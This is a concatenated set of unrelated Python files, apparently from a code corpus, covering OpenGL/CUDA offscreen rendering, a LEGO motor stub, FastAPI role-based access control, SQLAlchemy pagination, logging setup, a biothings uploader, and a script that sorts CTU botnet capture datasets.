gl.glShadeModel(gl.GL_FLAT)
if cull_face:
gl.glEnable(gl.GL_CULL_FACE)
gl.glCullFace(gl.GL_BACK)
else:
gl.glDisable(gl.GL_CULL_FACE)
gl.glClearColor(*self.clear_color)
gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
gl.glViewport(0, 0, self.viewport_size[0], self.viewport_size[1])
if scene.draw_points:
scene.program.draw(gl.GL_POINTS)
else:
assert scene.index_buffer is not None
scene.program.draw(gl.GL_TRIANGLES, scene.index_buffer)
if self.out_buffer_location == 'torch':
frame = cpy_texture_to_tensor(self.color_buf_cuda, self.out_buf).clone()
elif self.out_buffer_location == 'opengl':
frame = self.out_buf
else:
gl.glReadPixels(0, 0, self.viewport_size[0], self.viewport_size[1], gl.GL_RGB, gl.GL_FLOAT, self.out_buf)
frame = self.out_buf.copy()
self.fbo.deactivate()
return frame
@contextmanager
def cuda_activate_array(img):
"""Context manager simplifying use of pycuda.gl.RegisteredImage"""
mapping = img.map()
yield mapping.array(0,0)
mapping.unmap()
@contextmanager
def cuda_activate_buffer(buf):
mapping = buf.map()
yield mapping.device_ptr()
mapping.unmap()
def create_shared_texture(arr, map_flags=None):
"""Create and return a Texture2D with gloo and pycuda views."""
if map_flags is None:
map_flags = graphics_map_flags.WRITE_DISCARD
gl_view = arr.view(gloo.TextureFloat2D)
gl_view.activate() # force gloo to create on GPU
gl_view.deactivate()
cuda_view = pycuda.gl.RegisteredImage(
int(gl_view.handle), gl_view.target, map_flags)
return gl_view, cuda_view
def create_shared_buffer(arr):
"""Create and return a BufferObject with gloo and pycuda views."""
gl_view = arr.view(gloo.VertexBuffer)
gl_view.activate() # force gloo to create on GPU
gl_view.deactivate()
    cuda_view = BufferObject(int(gl_view.handle))
return gl_view, cuda_view
def cpy_texture_to_tensor(texture, tensor):
"""Copy GL texture (cuda view) to pytorch tensor"""
with cuda_activate_array(texture) as src:
cpy = pycuda.driver.Memcpy2D()
cpy.set_src_array(src)
cpy.set_dst_device(tensor.data_ptr())
cpy.width_in_bytes = cpy.src_pitch = cpy.dst_pitch = tensor.shape[1] * 4 * 4
cpy.height = tensor.shape[0]
cpy(aligned=False)
torch.cuda.synchronize()
return tensor
def cpy_tensor_to_texture(tensor, texture):
"""Copy pytorch tensor to GL texture (cuda view)"""
with cuda_activate_array(texture) as ary:
cpy = pycuda.driver.Memcpy2D()
cpy.set_src_device(tensor.data_ptr())
cpy.set_dst_array(ary)
cpy.width_in_bytes = cpy.src_pitch = cpy.dst_pitch = tensor.shape[1] * 4 * 4
cpy.height = tensor.shape[0]
cpy(aligned=False)
torch.cuda.synchronize()
return tensor
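# Note on the two 2-D copies above: width_in_bytes assumes a 4-channel float32
# image, i.e. tensor.shape[1] pixels * 4 channels * 4 bytes per channel, which
# matches the RGBA float buffers created in OffscreenRender._init_buffers.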
def cpy_buffer_to_tensor(buffer, tensor):
"""Copy GL buffer (cuda view) to pytorch tensor"""
n = tensor.numel()*tensor.element_size()
with cuda_activate_buffer(buffer) as buf_ptr:
pycuda.driver.memcpy_dtod(tensor.data_ptr(), buf_ptr, n)
def cpy_tensor_to_buffer(tensor, buffer):
"""Copy pytorch tensor to GL buffer (cuda view)"""
n = tensor.numel()*tensor.element_size()
with cuda_activate_buffer(buffer) as buf_ptr:
pycuda.driver.memcpy_dtod(buf_ptr, tensor.data_ptr(), n)
|
487277
|
from pybricks.parameters import Direction, Port
class DCMotor:
"""
Generic class to control simple motors without rotation sensors, such as train motors.
Args:
port (Port): Port to which the motor is connected.
positive_direction (Direction): Which direction the motor should turn when you give a positive duty cycle value.
"""
def __init__(self, port: Port, positive_direction: Direction = Direction.CLOCKWISE):
if port == Port.S1 or port == Port.S2 or port == Port.S3 or port == Port.S4:
raise ValueError("Motors must use Port A, B, C, or D.")
def dc(self, duty: int):
"""
Rotates the motor at a given duty cycle (also known as “power”).
Args:
duty (int): The duty cycle as a percentage (-100 to 100).
"""
...
def stop(self):
"""
Stops the motor and lets it spin freely.
The motor gradually stops due to friction.
"""
...
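# Usage sketch (assumes a train motor plugged into Port A):
#   motor = DCMotor(Port.A, positive_direction=Direction.CLOCKWISE)
#   motor.dc(50)    # run forward at half power
#   motor.stop()    # coast to a stop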
|
487284
|
from enum import Enum
REQUIRED_KEYS_FOR_LAMBDA_EVENT = ["path", "httpMethod"]
class OrganizationType(Enum):
ORGANIZATION = "organization"
INDIVIDUAL = "individual"
class VerificationType(Enum):
DUNS = "DUNS"
JUMIO = "JUMIO"
INDIVIDUAL = "INDIVIDUAL"
|
487291
|
import os
import shutil
import json
import config as c
with open('./infected_ips.json', 'r') as f:
infected_ips = json.load(f)
with open('./normal_ips.json', 'r') as f:
normal_ips = json.load(f)
index = 0
for sub_set in os.listdir(c.datasets_folder_general):
if sub_set.startswith(".") or not os.path.exists(datasets_folder + sub_set + '/bro/ssl.log'):
continue
dataset_folder = c.datasets_folder_general + sub_set
index += 1
dataset_number = int(sub_set.split('-')[4])
if sub_set.startswith("CTU-Malware-Capture-Botnet-") and (dataset_number <= 42 or dataset_number >= 54):
print("========================================================")
print("======== #" + str(index) + " " + sub_set)
print("========================================================")
if len(infected_ips[sub_set][0]) == 0 and \
len(normal_ips[sub_set][0]) == 0:
print("Moving dataset {} ({}) to {}".format(sub_set, dataset_folder, folder_other_datasets))
shutil.move(dataset_folder, c.datasets_discarded_folder)
|
487297
|
from fastapi import FastAPI
from fastapi_authorization.rbac import RBAC
from fastapi_authorization.testing import auto_test_protected_endpoints
auth = RBAC(lambda: "admin")
auth.add_role("admin", permissions=["user:create", "user:read"])
auth.add_role("superadmin", permissions=["admin:create", "admin:read"])
auth.add_role("user", permissions=["user:read"])
app = FastAPI()
@app.get("/", dependencies=[auth.Permission("user:read")])
def get_endpoint():
...
auto_test_protected_endpoints(app, auth)
|
487302
|
from math import ceil
from boiler.collections.pagination import paginate
from pprint import pprint as pp
class PaginatedCollection:
    """
    Paginated collection
    Accepts an SQLAlchemy query object on initialization along with some
    pagination settings and then allows you to iterate over itself in a
    paginated manner: iterate over items in current page then call next_page()
    to fetch next slice of data.
    """
    def __init__(self, query, *_, page=1, per_page=10, pagination_range=5):
        """
        Initialise collection
        Creates an instance of collection. Requires a query object to
        iterate through. Will issue 2 queries: one to count total items and
        a second to fetch the actual items. Optionally generates a page range
        to print range-like paginations of a given slice size.
        :param query:
        :param _: args, ignored
        :param page: int, page to fetch
        :param per_page: int, items per page
        :param pagination_range: int, number of pages in pagination
        """
        self._query = query
        self.page = page
        self.per_page = per_page
        self.total_items = self._query.count()
        self.total_pages = ceil(self.total_items / per_page)
        # paginate
        self.pagination = paginate(
            page=page,
            total_pages=self.total_pages,
            total_items=self.total_items,
            slice_size=pagination_range
        )['pagination']
        # fetch items
        self.items = self.fetch_items()
    def __repr__(self):
        """ Get printable representation of collection """
        data = 'page="{}" per_page="{}" total_items="{}" total_pages="{}" '
        data += 'items="[...]"' if len(list(self.items)) > 0 else 'items="[]"'
        class_name = self.__class__.__name__
        printable = '<{} {}>'.format(class_name, data)
        return printable.format(
            self.page,
            self.per_page,
            self.total_items,
            self.total_pages
        )
    def __iter__(self):
        """ Performs generator-based iteration through page items """
        offset = 0
        while offset < len(self.items):
            item = self.items[offset]
            offset += 1
            yield item
    def fetch_items(self):
        """
        Fetch items
        Performs a query to retrieve items based on current query and
        pagination settings.
        """
        offset = self.per_page * (self.page - 1)
        items = self._query.limit(self.per_page).offset(offset).all()
        return items
    def dict(self):
        """ Returns current collection as a dictionary """
        collection = dict(
            page=self.page,
            per_page=self.per_page,
            total_items=self.total_items,
            total_pages=self.total_pages,
            pagination=self.pagination,
            items=list(self.items)
        )
        return collection
    def is_first_page(self):
        """ Check if we are on the first page """
        return self.page == 1
    def is_last_page(self):
        """ Checks if we are on the last page """
        return self.page == self.total_pages
    def next_page(self):
        """
        Next page
        Uses query object to fetch next slice of items unless on last page, in
        which case it does nothing
        """
        if self.is_last_page():
            return False
        self.page += 1
        self.items = self.fetch_items()
        return True
    def previous_page(self):
        """
        Previous page
        Uses query object to fetch previous slice of items unless on first
        page, in which case it does nothing
        """
        if self.is_first_page():
            return False
        self.page -= 1
        self.items = self.fetch_items()
        return True
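# --- Hedged usage sketch (not part of the original module) ---
# `query` stands for any SQLAlchemy query object (e.g. session.query(User));
# the sketch walks every page and prints each item, using only the class's
# own API shown above.
def _example_iterate_all_pages(query):
    collection = PaginatedCollection(query, page=1, per_page=10)
    for _ in range(collection.total_pages):
        for item in collection:
            print(item)
        collection.next_page()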
|
487327
|
import logging
import coloredlogs
import traceback
from logging.handlers import RotatingFileHandler
import os
import pathlib
# init coloredlogs
__fmt = '[%(name)s][%(levelname)s] (%(filename)s:%(lineno)d):\n%(message)s\n'
# get and conf root logger
root_logger: logging.Logger = logging.getLogger('UMR')
coloredlogs.install(fmt=__fmt, level='DEBUG')
def __log_except_hook(*exc_info):
    # Output unhandled exception
    ex_hook_logger = root_logger.getChild('UnknownException')
    text = "".join(traceback.format_exception(*exc_info))
    ex_hook_logger.error("Unhandled exception: %s", text)
def get_logger(suffix):
    return root_logger.getChild(suffix)
def post_init():
    # Logger for this module
    logger = root_logger.getChild('Logging')
    logger.info('Initializing logging')
    from .UMRConfig import config
    # log level
    if '*' in config.LogLevel:
        root_logger.setLevel(f"{config.LogLevel['*']}")
    for logger_name in config.LogLevel:
        if logger_name == '*':
            continue
        logging.getLogger(logger_name).setLevel(f"{config.LogLevel[logger_name]}")
    # log to file
    log_path = config.LogRoot
    if log_path.startswith('~'):
        home = str(pathlib.Path.home())
        log_path = f'{home}/{config.LogRoot[1:]}'
    # set rotate handler
    os.makedirs(log_path, exist_ok=True)  # create logging folder
    rotate_handler = RotatingFileHandler(
        os.path.join(log_path, 'bot.log'), maxBytes=1048576, backupCount=1, encoding='utf-8')
    standard_formatter = logging.Formatter(
        '[%(asctime)s][%(name)s][%(levelname)s] (%(filename)s:%(lineno)d):\n%(message)s\n')
    rotate_handler.setFormatter(standard_formatter)
    # __root_logger.addHandler(__rotate_handler)
    logging.getLogger().addHandler(rotate_handler)
    logger.info('Initialized logging')
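# --- Hedged usage sketch (not part of the original module) ---
# Typical use from another part of the bot: grab a named child logger up front,
# then call post_init() once .UMRConfig can be imported so per-logger levels and
# the rotating file handler take effect. The plugin name is illustrative.
def _example_logging_usage():
    log = get_logger('ExamplePlugin')   # logger named 'UMR.ExamplePlugin'
    log.info('plugin loaded')
    post_init()                         # requires the relative .UMRConfig import to resolve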
|
487349
|
import biothings.hub.dataload.uploader as uploader
class WikipediaUploader(uploader.DummySourceUploader):
    name = "wikipedia"
    @classmethod
    def get_mapping(klass):
        mapping = {
            "wikipedia": {
                "dynamic": False,
                "properties": {
                    "url_stub": {
                        "type": "text",
                        "copy_to": ["all"],
                    }
                }
            }
        }
        return mapping
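# --- Hedged example (not part of the uploader) ---
# Illustrates the document shape the mapping above describes: a "wikipedia"
# object carrying a url_stub text field. The _id and the value are made up.
_EXAMPLE_DOC = {
    "_id": "CDK2",
    "wikipedia": {"url_stub": "Cyclin-dependent_kinase_2"},
}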
|